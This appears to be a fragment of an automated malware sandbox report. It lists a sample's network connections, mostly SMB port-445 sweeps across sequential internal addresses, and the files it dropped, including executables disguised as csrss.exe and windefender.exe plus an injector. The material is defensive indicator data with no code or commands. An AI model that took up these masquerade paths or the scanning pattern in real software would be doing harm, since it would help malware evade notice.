| N/A | 10.127.2.238:445 | tcp | |
| N/A | 10.127.2.230:445 | tcp | |
| N/A | 10.127.2.233:445 | tcp | |
| N/A | 10.127.2.235:445 | tcp | |
| N/A | 10.127.2.204:445 | tcp | |
| N/A | 10.127.2.245:445 | tcp | |
| N/A | 10.127.2.250:445 | tcp | |
| N/A | 10.127.2.207:445 | tcp | |
| N/A | 10.127.2.225:445 | tcp | |
| N/A | 10.127.2.237:445 | tcp | |
| N/A | 10.127.2.227:445 | tcp | |
| N/A | 10.127.2.232:445 | tcp | |
| N/A | 10.127.2.209:445 | tcp | |
| N/A | 10.127.2.253:445 | tcp | |
| N/A | 10.127.3.27:445 | tcp | |
| N/A | 10.127.3.5:445 | tcp | |
| N/A | 10.127.3.52:445 | tcp | |
| N/A | 10.127.3.53:445 | tcp | |
| N/A | 10.127.3.60:445 | tcp | |
| N/A | 10.127.3.24:445 | tcp | |
| N/A | 10.127.3.43:445 | tcp | |
| N/A | 10.127.3.48:445 | tcp | |
| N/A | 10.127.3.51:445 | tcp | |
| N/A | 10.127.3.29:445 | tcp | |
| N/A | 10.127.3.6:445 | tcp | |
| N/A | 10.127.3.41:445 | tcp | |
| N/A | 10.127.3.63:445 | tcp | |
| N/A | 10.127.3.25:445 | tcp | |
| N/A | 10.127.3.7:445 | tcp | |
| N/A | 10.127.3.40:445 | tcp | |
| N/A | 10.127.3.57:445 | tcp | |
| N/A | 10.127.3.4:445 | tcp | |
| N/A | 10.127.3.15:445 | tcp | |
| N/A | 10.127.3.20:445 | tcp | |
| N/A | 10.127.3.56:445 | tcp | |
| N/A | 10.127.3.33:445 | tcp | |
| N/A | 10.127.3.31:445 | tcp | |
| N/A | 10.127.3.8:445 | tcp | |
| N/A | 10.127.3.17:445 | tcp | |
| N/A | 10.127.3.35:445 | tcp | |
| N/A | 10.127.3.19:445 | tcp | |
| N/A | 10.127.3.44:445 | tcp | |
| N/A | 10.127.3.23:445 | tcp | |
| N/A | 10.127.3.45:445 | tcp | |
| N/A | 10.127.3.47:445 | tcp | |
| N/A | 10.127.3.14:445 | tcp | |
| N/A | 10.127.3.49:445 | tcp | |
| N/A | 10.127.3.54:445 | tcp | |
| N/A | 10.127.3.13:445 | tcp | |
| N/A | 10.127.3.38:445 | tcp | |
| N/A | 10.127.3.3:445 | tcp | |
| N/A | 10.127.3.12:445 | tcp | |
| N/A | 10.127.3.64:445 | tcp | |
| N/A | 10.127.3.21:445 | tcp | |
| N/A | 10.127.3.30:445 | tcp | |
| N/A | 10.127.3.22:445 | tcp | |
| N/A | 10.127.3.2:445 | tcp | |
| N/A | 10.127.3.37:445 | tcp | |
| N/A | 10.127.3.62:445 | tcp | |
| N/A | 10.127.3.28:445 | tcp | |
| N/A | 10.127.3.1:445 | tcp | |
| N/A | 10.127.3.26:445 | tcp | |
| N/A | 10.127.3.39:445 | tcp | |
| N/A | 10.127.3.16:445 | tcp | |
| N/A | 10.127.3.55:445 | tcp | |
| N/A | 10.127.3.36:445 | tcp | |
| N/A | 10.127.3.10:445 | tcp | |
| N/A | 10.127.3.58:445 | tcp | |
| N/A | 10.127.3.61:445 | tcp | |
| N/A | 10.127.3.18:445 | tcp | |
| N/A | 10.127.3.34:445 | tcp | |
| N/A | 10.127.3.42:445 | tcp | |
| N/A | 10.127.3.50:445 | tcp | |
| N/A | 10.127.3.32:445 | tcp | |
| N/A | 10.127.3.9:445 | tcp | |
| N/A | 10.127.3.46:445 | tcp | |
| N/A | 10.127.3.11:445 | tcp | |
| N/A | 10.127.3.59:445 | tcp | |
| N/A | 10.127.3.107:445 | tcp | |
| N/A | 10.127.3.113:445 | tcp | |
| N/A | 10.127.3.75:445 | tcp | |
| N/A | 10.127.3.83:445 | tcp | |
| N/A | 10.127.3.109:445 | tcp | |
| N/A | 10.127.3.89:445 | tcp | |
| N/A | 10.127.3.111:445 | tcp | |
| N/A | 10.127.3.122:445 | tcp | |
| N/A | 10.127.3.117:445 | tcp | |
| N/A | 10.127.3.114:445 | tcp | |
| N/A | 10.127.3.125:445 | tcp | |
| N/A | 10.127.3.128:445 | tcp | |
| N/A | 10.127.3.102:445 | tcp | |
| N/A | 10.127.3.124:445 | tcp | |
| N/A | 10.127.3.66:445 | tcp | |
| N/A | 10.127.3.120:445 | tcp | |
| N/A | 10.127.3.69:445 | tcp | |
| N/A | 10.127.3.127:445 | tcp | |
| N/A | 10.127.3.119:445 | tcp | |
| N/A | 10.127.3.84:445 | tcp | |
| N/A | 10.127.3.97:445 | tcp | |
| N/A | 10.127.3.88:445 | tcp | |
| N/A | 10.127.3.70:445 | tcp | |
| N/A | 10.127.3.71:445 | tcp | |
| N/A | 10.127.3.104:445 | tcp | |
| N/A | 10.127.3.74:445 | tcp | |
| N/A | 10.127.3.106:445 | tcp | |
| N/A | 10.127.3.92:445 | tcp | |
| N/A | 10.127.3.93:445 | tcp | |
| N/A | 10.127.3.98:445 | tcp | |
| N/A | 10.127.3.100:445 | tcp | |
| N/A | 10.127.3.91:445 | tcp | |
| N/A | 10.127.3.94:445 | tcp | |
| N/A | 10.127.3.123:445 | tcp | |
| N/A | 10.127.3.101:445 | tcp | |
| N/A | 10.127.3.118:445 | tcp | |
| N/A | 10.127.3.126:445 | tcp | |
| N/A | 10.127.3.76:445 | tcp | |
| N/A | 10.127.3.87:445 | tcp | |
| N/A | 10.127.3.82:445 | tcp | |
| N/A | 10.127.3.85:445 | tcp | |
| N/A | 10.127.3.103:445 | tcp | |
| N/A | 10.127.3.77:445 | tcp | |
| N/A | 10.127.3.110:445 | tcp | |
| N/A | 10.127.3.81:445 | tcp | |
| N/A | 10.127.3.99:445 | tcp | |
| N/A | 10.127.3.121:445 | tcp | |
| N/A | 10.127.3.67:445 | tcp | |
| N/A | 10.127.3.105:445 | tcp | |
| N/A | 10.127.3.73:445 | tcp | |
| N/A | 10.127.3.72:445 | tcp | |
| N/A | 10.127.3.116:445 | tcp | |
| N/A | 10.127.3.95:445 | tcp | |
| N/A | 10.127.3.96:445 | tcp | |
| N/A | 10.127.3.79:445 | tcp | |
| N/A | 10.127.3.90:445 | tcp | |
| N/A | 10.127.3.78:445 | tcp | |
| N/A | 10.127.3.80:445 | tcp | |
| N/A | 10.127.3.68:445 | tcp | |
| N/A | 10.127.3.86:445 | tcp | |
| N/A | 10.127.3.65:445 | tcp | |
| N/A | 10.127.3.112:445 | tcp | |
| N/A | 10.127.3.115:445 | tcp | |
| N/A | 10.127.3.108:445 | tcp | |
| N/A | 127.0.0.1:31465 | tcp | |
| N/A | 10.127.3.135:445 | tcp | |
| N/A | 10.127.3.130:445 | tcp | |
| N/A | 10.127.3.185:445 | tcp | |
| N/A | 10.127.3.190:445 | tcp | |
| N/A | 10.127.3.166:445 | tcp | |
| N/A | 10.127.3.168:445 | tcp | |
| N/A | 10.127.3.150:445 | tcp | |
| N/A | 10.127.3.180:445 | tcp | |
| N/A | 10.127.3.129:445 | tcp | |
| N/A | 10.127.3.167:445 | tcp | |
| N/A | 10.127.3.163:445 | tcp | |
| N/A | 10.127.3.178:445 | tcp | |
| N/A | 10.127.3.131:445 | tcp | |
| N/A | 10.127.3.177:445 | tcp | |
| N/A | 10.127.3.165:445 | tcp | |
| N/A | 10.127.3.181:445 | tcp | |
| N/A | 10.127.3.137:445 | tcp | |
| N/A | 10.127.3.164:445 | tcp | |
| N/A | 10.127.3.170:445 | tcp | |
| N/A | 10.127.3.142:445 | tcp | |
| N/A | 10.127.3.147:445 | tcp | |
| N/A | 10.127.3.148:445 | tcp | |
| N/A | 10.127.3.149:445 | tcp | |
| N/A | 10.127.3.192:445 | tcp | |
| N/A | 10.127.3.140:445 | tcp | |
| N/A | 10.127.3.191:445 | tcp | |
| N/A | 10.127.3.184:445 | tcp | |
| N/A | 10.127.3.179:445 | tcp | |
| N/A | 10.127.3.138:445 | tcp | |
| N/A | 10.127.3.143:445 | tcp | |
| N/A | 10.127.3.146:445 | tcp | |
| N/A | 10.127.3.160:445 | tcp | |
| N/A | 10.127.3.182:445 | tcp | |
| N/A | 10.127.3.175:445 | tcp | |
| N/A | 10.127.3.187:445 | tcp | |
| N/A | 10.127.3.159:445 | tcp | |
| N/A | 10.127.3.162:445 | tcp | |
| N/A | 10.127.3.133:445 | tcp | |
| N/A | 10.127.3.145:445 | tcp | |
| N/A | 10.127.3.155:445 | tcp | |
| N/A | 10.127.3.174:445 | tcp | |
| N/A | 10.127.3.153:445 | tcp | |
| N/A | 10.127.3.172:445 | tcp | |
| N/A | 10.127.3.171:445 | tcp | |
| N/A | 10.127.3.157:445 | tcp | |
| N/A | 10.127.3.154:445 | tcp | |
| N/A | 10.127.3.176:445 | tcp | |
| N/A | 10.127.3.136:445 | tcp | |
| N/A | 10.127.3.141:445 | tcp | |
| N/A | 10.127.3.151:445 | tcp | |
| N/A | 10.127.3.152:445 | tcp | |
| N/A | 10.127.3.173:445 | tcp | |
| N/A | 10.127.3.156:445 | tcp | |
| N/A | 10.127.3.161:445 | tcp | |
| N/A | 10.127.3.189:445 | tcp | |
| N/A | 10.127.3.132:445 | tcp | |
| N/A | 10.127.3.169:445 | tcp | |
| N/A | 10.127.3.188:445 | tcp | |
| N/A | 10.127.3.158:445 | tcp | |
| N/A | 10.127.3.183:445 | tcp | |
| N/A | 10.127.3.134:445 | tcp | |
| N/A | 10.127.3.144:445 | tcp | |
| N/A | 10.127.3.186:445 | tcp | |
| N/A | 10.127.3.139:445 | tcp | |
| N/A | 10.127.3.205:445 | tcp | |
| N/A | 10.127.3.230:445 | tcp | |
| N/A | 10.127.3.240:445 | tcp | |
| N/A | 10.127.3.236:445 | tcp | |
| N/A | 10.127.3.209:445 | tcp | |
| N/A | 10.127.3.234:445 | tcp | |
| N/A | 10.127.3.249:445 | tcp | |
| N/A | 10.127.3.225:445 | tcp | |
| N/A | 10.127.3.217:445 | tcp | |
| N/A | 10.127.3.239:445 | tcp | |
| N/A | 10.127.3.237:445 | tcp | |
| N/A | 10.127.3.244:445 | tcp | |
| N/A | 10.127.3.255:445 | tcp | |
| N/A | 10.127.3.197:445 | tcp | |
| N/A | 10.127.3.198:445 | tcp | |
| N/A | 10.127.3.241:445 | tcp | |
| N/A | 10.127.3.194:445 | tcp | |
| N/A | 10.127.3.207:445 | tcp | |
| N/A | 10.127.3.201:445 | tcp | |
| N/A | 10.127.3.220:445 | tcp | |
| N/A | 10.127.3.227:445 | tcp | |
| N/A | 10.127.3.253:445 | tcp | |
| N/A | 10.127.3.212:445 | tcp | |
| N/A | 10.127.3.238:445 | tcp | |
| N/A | 10.127.3.226:445 | tcp | |
| N/A | 10.127.3.232:445 | tcp | |
| N/A | 10.127.3.228:445 | tcp | |
| N/A | 10.127.3.213:445 | tcp | |
| N/A | 10.127.3.248:445 | tcp | |
| N/A | 10.127.3.193:445 | tcp | |
| N/A | 10.127.3.206:445 | tcp | |
| N/A | 10.127.3.204:445 | tcp | |
| N/A | 10.127.3.208:445 | tcp | |
| N/A | 10.127.3.229:445 | tcp | |
| N/A | 10.127.3.210:445 | tcp | |
| N/A | 10.127.3.224:445 | tcp | |
| N/A | 10.127.3.251:445 | tcp | |
| N/A | 10.127.3.202:445 | tcp | |
| N/A | 10.127.3.222:445 | tcp | |
| N/A | 10.127.3.223:445 | tcp | |
| N/A | 10.127.3.200:445 | tcp | |
| N/A | 10.127.3.203:445 | tcp | |
| N/A | 10.127.3.233:445 | tcp | |
| N/A | 10.127.3.215:445 | tcp | |
| N/A | 10.127.3.199:445 | tcp | |
| N/A | 10.127.3.235:445 | tcp | |
| N/A | 10.127.3.243:445 | tcp | |
| N/A | 10.127.3.221:445 | tcp | |
| N/A | 10.127.3.245:445 | tcp | |
| N/A | 10.127.3.214:445 | tcp | |
| N/A | 10.127.3.216:445 | tcp | |
| N/A | 10.127.3.219:445 | tcp | |
| N/A | 10.127.3.242:445 | tcp | |
| N/A | 10.127.3.218:445 | tcp | |
| N/A | 10.127.3.195:445 | tcp | |
| N/A | 10.127.3.250:445 | tcp | |
| N/A | 10.127.3.196:445 | tcp | |
| N/A | 10.127.3.254:445 | tcp | |
| N/A | 10.127.3.211:445 | tcp | |
| N/A | 10.127.3.231:445 | tcp | |
| N/A | 10.127.3.252:445 | tcp | |
| N/A | 10.127.4.0:445 | tcp | |
| N/A | 10.127.3.247:445 | tcp | |
| N/A | 10.127.3.246:445 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 127.0.0.1:31465 | tcp | |
| N/A | 10.127.4.1:445 | tcp | |
| N/A | 10.127.4.2:445 | tcp | |
| N/A | 10.127.4.3:445 | tcp | |
| N/A | 10.127.4.4:445 | tcp | |
| N/A | 10.127.4.5:445 | tcp | |
| N/A | 10.127.4.6:445 | tcp | |
| N/A | 10.127.4.7:445 | tcp | |
| N/A | 10.127.4.8:445 | tcp | |
| N/A | 10.127.4.10:445 | tcp | |
| N/A | 10.127.4.9:445 | tcp | |
| N/A | 10.127.4.11:445 | tcp | |
| N/A | 10.127.4.31:445 | tcp | |
| N/A | 10.127.4.30:445 | tcp | |
| N/A | 10.127.4.32:445 | tcp | |
| N/A | 10.127.4.12:445 | tcp | |
| N/A | 10.127.4.33:445 | tcp | |
| N/A | 10.127.4.34:445 | tcp | |
| N/A | 10.127.4.13:445 | tcp | |
| N/A | 10.127.4.35:445 | tcp | |
| N/A | 10.127.4.14:445 | tcp | |
| N/A | 10.127.4.36:445 | tcp | |
| N/A | 10.127.4.37:445 | tcp | |
| N/A | 10.127.4.15:445 | tcp | |
| N/A | 10.127.4.38:445 | tcp | |
| N/A | 10.127.4.39:445 | tcp | |
| N/A | 10.127.4.16:445 | tcp | |
| N/A | 10.127.4.40:445 | tcp | |
| N/A | 10.127.4.41:445 | tcp | |
| N/A | 10.127.4.42:445 | tcp | |
| N/A | 10.127.4.50:445 | tcp | |
| N/A | 10.127.4.17:445 | tcp | |
| N/A | 10.127.4.18:445 | tcp | |
| N/A | 10.127.4.19:445 | tcp | |
| N/A | 10.127.4.20:445 | tcp | |
| N/A | 10.127.4.43:445 | tcp | |
| N/A | 10.127.4.44:445 | tcp | |
| N/A | 10.127.4.21:445 | tcp | |
| N/A | 10.127.4.45:445 | tcp | |
| N/A | 10.127.4.46:445 | tcp | |
| N/A | 10.127.4.22:445 | tcp | |
| N/A | 10.127.4.23:445 | tcp | |
| N/A | 10.127.4.24:445 | tcp | |
| N/A | 10.127.4.25:445 | tcp | |
| N/A | 10.127.4.26:445 | tcp | |
| N/A | 10.127.4.27:445 | tcp | |
| N/A | 10.127.4.28:445 | tcp | |
| N/A | 10.127.4.29:445 | tcp | |
| N/A | 10.127.4.51:445 | tcp | |
| N/A | 10.127.4.52:445 | tcp | |
| N/A | 10.127.4.53:445 | tcp | |
| N/A | 10.127.4.54:445 | tcp | |
| N/A | 10.127.4.55:445 | tcp | |
| N/A | 10.127.4.56:445 | tcp | |
| N/A | 10.127.4.47:445 | tcp | |
| N/A | 10.127.4.48:445 | tcp | |
| N/A | 10.127.4.49:445 | tcp | |
| N/A | 10.127.4.57:445 | tcp | |
| N/A | 10.127.4.58:445 | tcp | |
| N/A | 10.127.4.59:445 | tcp | |
| N/A | 10.127.4.60:445 | tcp | |
| N/A | 10.127.4.61:445 | tcp | |
| N/A | 10.127.4.62:445 | tcp | |
| N/A | 10.127.4.63:445 | tcp | |
| N/A | 10.127.4.64:445 | tcp | |
| N/A | 10.127.4.65:445 | tcp | |
| N/A | 10.127.4.92:445 | tcp | |
| N/A | 10.127.4.86:445 | tcp | |
| N/A | 10.127.4.93:445 | tcp | |
| N/A | 10.127.4.109:445 | tcp | |
| N/A | 10.127.4.106:445 | tcp | |
| N/A | 10.127.4.104:445 | tcp | |
| N/A | 10.127.4.69:445 | tcp | |
| N/A | 10.127.4.71:445 | tcp | |
| N/A | 10.127.4.88:445 | tcp | |
| N/A | 10.127.4.66:445 | tcp | |
| N/A | 10.127.4.67:445 | tcp | |
| N/A | 10.127.4.68:445 | tcp | |
| N/A | 10.127.4.70:445 | tcp | |
| N/A | 10.127.4.72:445 | tcp | |
| N/A | 10.127.4.73:445 | tcp | |
| N/A | 10.127.4.74:445 | tcp | |
| N/A | 10.127.4.76:445 | tcp | |
| N/A | 10.127.4.75:445 | tcp | |
| N/A | 10.127.4.77:445 | tcp | |
| N/A | 10.127.4.78:445 | tcp | |
| N/A | 10.127.4.79:445 | tcp | |
| N/A | 10.127.4.80:445 | tcp | |
| N/A | 10.127.4.82:445 | tcp | |
| N/A | 10.127.4.81:445 | tcp | |
| N/A | 10.127.4.83:445 | tcp | |
| N/A | 10.127.4.91:445 | tcp | |
| N/A | 10.127.4.84:445 | tcp | |
| N/A | 10.127.4.85:445 | tcp | |
| N/A | 10.127.4.87:445 | tcp | |
| N/A | 10.127.4.89:445 | tcp | |
| N/A | 10.127.4.90:445 | tcp | |
| N/A | 10.127.4.94:445 | tcp | |
| N/A | 10.127.4.95:445 | tcp | |
| N/A | 10.127.4.96:445 | tcp | |
| N/A | 10.127.4.97:445 | tcp | |
| N/A | 10.127.4.98:445 | tcp | |
| N/A | 10.127.4.99:445 | tcp | |
| N/A | 10.127.4.100:445 | tcp | |
| N/A | 10.127.4.101:445 | tcp | |
| N/A | 10.127.4.102:445 | tcp | |
| N/A | 10.127.4.103:445 | tcp | |
| N/A | 10.127.4.105:445 | tcp | |
| N/A | 10.127.4.107:445 | tcp | |
| N/A | 10.127.4.108:445 | tcp | |
| N/A | 10.127.4.110:445 | tcp | |
| N/A | 10.127.4.111:445 | tcp | |
| N/A | 10.127.4.112:445 | tcp | |
| N/A | 10.127.4.113:445 | tcp | |
| N/A | 10.127.4.114:445 | tcp | |
| N/A | 10.127.4.115:445 | tcp | |
| N/A | 10.127.4.116:445 | tcp | |
| N/A | 10.127.4.117:445 | tcp | |
| N/A | 10.127.4.118:445 | tcp | |
| N/A | 10.127.4.119:445 | tcp | |
| N/A | 10.127.4.120:445 | tcp | |
| N/A | 10.127.4.121:445 | tcp | |
| N/A | 10.127.4.122:445 | tcp | |
| N/A | 10.127.4.123:445 | tcp | |
| N/A | 10.127.4.124:445 | tcp | |
| N/A | 10.127.4.125:445 | tcp | |
| N/A | 10.127.4.126:445 | tcp | |
| N/A | 10.127.4.127:445 | tcp | |
| N/A | 10.127.4.128:445 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2acus0z.nkr.ps1
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe